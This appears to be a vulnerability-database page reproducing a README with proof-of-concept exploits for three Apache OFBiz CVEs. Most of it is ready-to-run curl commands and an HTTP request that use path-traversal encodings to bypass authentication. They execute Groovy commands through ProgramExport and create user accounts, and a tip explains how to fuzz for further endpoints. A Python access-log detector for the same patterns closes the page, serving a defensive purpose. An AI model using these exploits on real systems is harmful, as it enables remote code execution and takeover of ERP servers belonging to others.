POC details: 220273f013016829310f8df50b25869fe3ccfcb2

Source
Related vulnerability
Title: Apache OFBiz path traversal vulnerability (CVE-2024-32113)
Description: Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Foundation of the United States. It provides a full suite of Java-based web application components and tools. Apache OFBiz versions before 18.12.13 contain a path traversal vulnerability caused by improper limitation of a pathname to a restricted directory.
Description
Apache OfBiz vulns
Introduction
# Apache OfBiz vulns

### POC for CVE-2024-32113

The `USERNAME` and `PASSWORD` params can be provided at the `/ecomseo/AnonContactus` interface, which is publicly accessible to anyone.

- POC1: RCE

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

- POC2: You can bypass the login to access the restricted webtools management interface.

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'JavaScriptEnabled=Y'
  ```

- POC3: You can register a regular user account, where `userLoginId` is the username.

  ```shell
  curl --noproxy '*'  -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'enabled=Y' \
  --data-urlencode 'partyId=' \
  --data-urlencode 'userLoginId=30000' \
  --data-urlencode 'currentPassword=12345' \
  --data-urlencode 'currentPasswordVerify=12345' \
  --data-urlencode 'passwordHint=' \
  --data-urlencode 'requirePasswordChange=N' \
  --data-urlencode 'securityQuestion=' \
  --data-urlencode 'SecurityAnswer=' \
  --data-urlencode 'externalAuthId='
  ```

### POC For CVE-2024-36104

- RCE1

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

- RCE2

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

  PS: the `;` in the path causes the cookie-setting code to throw an exception, so you need to obtain the cookie manually.

  ![image-20240514104449523](./README/image-20240514104449523.png)

![image-20240514104433195](./README/image-20240514104433195.png)

### POC For CVE-2024-38856

- RCE

  ```http
  POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 127.0.0.1:8443
  
  groovyProgram=throw+new+Exception('id'.execute().text);
  ```

  **PS**: `forgotPassword` can be replaced with other requests. You can find candidates by searching `webapp/webtools/WEB-INF/controller.xml` (as shown in the picture) and fuzzing them. Any request that returns `success` can be used to reach the `ProgramExport` module and trigger RCE.

  ![image-20240604195154504](README/image-20240604195154504.png)
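For defenders, the three traversal encodings above (`../`, `.%2e/`, `..;/`) and the CVE-2024-38856 view-chaining shape (`control/forgotPassword/ProgramExport`) can be recognised in access logs by normalising the request path the way the servlet container effectively does and then checking where it lands. The following detector is an added example, not code from this repository; the log lines are constructed, and `SENSITIVE_VIEWS` is a placeholder set you would extend with your own deployment's privileged views.

```python
import re
from urllib.parse import unquote

# Views that must only be reachable with an authenticated admin session.
# Constructed placeholder: only ProgramExport is named on this page.
SENSITIVE_VIEWS = {"ProgramExport"}

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A path segment that is '.', '..', '%2e', '.%2e', ... optionally followed by ';params'
DOT_SEGMENT_RE = re.compile(r"(?i)(?:^|/)(?:%2e|\.){1,2}(?:;[^/]*)?(?:/|$)")

def normalize_path(raw_path):
    """Approximate container resolution: one percent-decode, strip ';' path
    parameters per segment (so '..;' becomes '..'), then collapse '.'/'..'."""
    path = unquote(raw_path.split("?", 1)[0])
    parts = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)

def classify(log_line):
    """Return sorted finding tags for one access-log line ([] if unremarkable)."""
    m = LOG_RE.search(log_line)
    if not m:
        return []
    raw = m.group("path")
    segs = normalize_path(raw).strip("/").split("/")
    findings = []
    if DOT_SEGMENT_RE.search(raw):
        findings.append("traversal")                      # any dot-segment trick in the raw URI
    if len(segs) >= 2 and segs[1] == "control":
        views = segs[2:]
        if views and views[-1] in SENSITIVE_VIEWS:
            findings.append("sensitive-view")             # request ends on a privileged view
            if len(views) > 1:
                findings.append("view-chaining")          # CVE-2024-38856 shape: view/view
        raw_ctx = unquote(raw).lstrip("/").split("/", 1)[0].split(";", 1)[0]
        if raw_ctx != segs[0]:
            findings.append("context-escape")             # started in one webapp, landed in another
    return sorted(findings)

def scan(lines):
    """Yield (raw path, findings) for every line that produced at least one finding."""
    hits = []
    for line in lines:
        f = classify(line)
        if f:
            hits.append((LOG_RE.search(line).group("path"), f))
    return hits

# Constructed sample log lines mirroring the request shapes discussed above.
LOG_LINES = [
    '10.0.0.5 - - [14/May/2024:10:44:49 +0000] "POST /xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport HTTP/1.1" 200 512',
    '10.0.0.5 - - [14/May/2024:10:44:50 +0000] "POST /xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport HTTP/1.1" 200 512',
    '10.0.0.5 - - [14/May/2024:10:44:51 +0000] "POST /xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport HTTP/1.1" 200 512',
    '10.0.0.6 - - [04/Jun/2024:19:51:54 +0000] "POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1" 200 640',
    '10.0.0.7 - - [04/Jun/2024:19:52:10 +0000] "GET /ecomseo/AnonContactus HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for path, findings in scan(LOG_LINES):
        print(path, "->", ", ".join(findings))
```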